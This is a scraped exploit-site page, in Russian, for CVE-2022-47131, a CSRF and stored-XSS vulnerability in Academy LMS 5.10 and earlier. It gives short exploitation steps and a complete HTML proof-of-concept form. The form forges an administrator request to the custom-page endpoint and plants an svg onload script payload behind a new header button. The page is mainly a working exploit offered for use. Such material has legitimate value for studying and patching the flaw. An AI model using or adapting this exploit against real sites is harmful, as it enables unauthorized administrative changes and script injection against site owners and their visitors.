## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-OPENXP-RESEARCH-CVE-2022-47131
# CVE-2022-47131
Academy LMS <= 5.10 CSRF / XSS
# Описание
Academy LMS — это приложение, где люди могут создавать и рекламировать курсы. Функция добавления новой страницы уязвима к CSRF, так как отсутствует токен, который предотвращал бы эту атаку. Кроме того, эта страница может использоваться для загрузки сохранённой XSS-нагрузки.
# Доказательство концепции (POC)
Первый шаг нашего доказательства концепции — аутентификация на платформе под администратором.
После этого просто перейдите на страницу, содержащую код для эксплуатации уязвимости. Обратите внимание, что на домашней странице сайта появится новая кнопка, перенаправляющая на XSS-страницу.
Код, используемый в эксплойте:
root@kitploit:~
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/custom_page/add" method="POST">
<input type="hidden" name="page_title" value="CSRF XSS" />
<input type="hidden" name="page_content" value=""><svg onload=alert(document.domain);> ;" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="button_title" value="CSRF XSS" />
<input type="hidden" name="button_position" value="header" />
<input type="hidden" name="page_url" value="xss" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>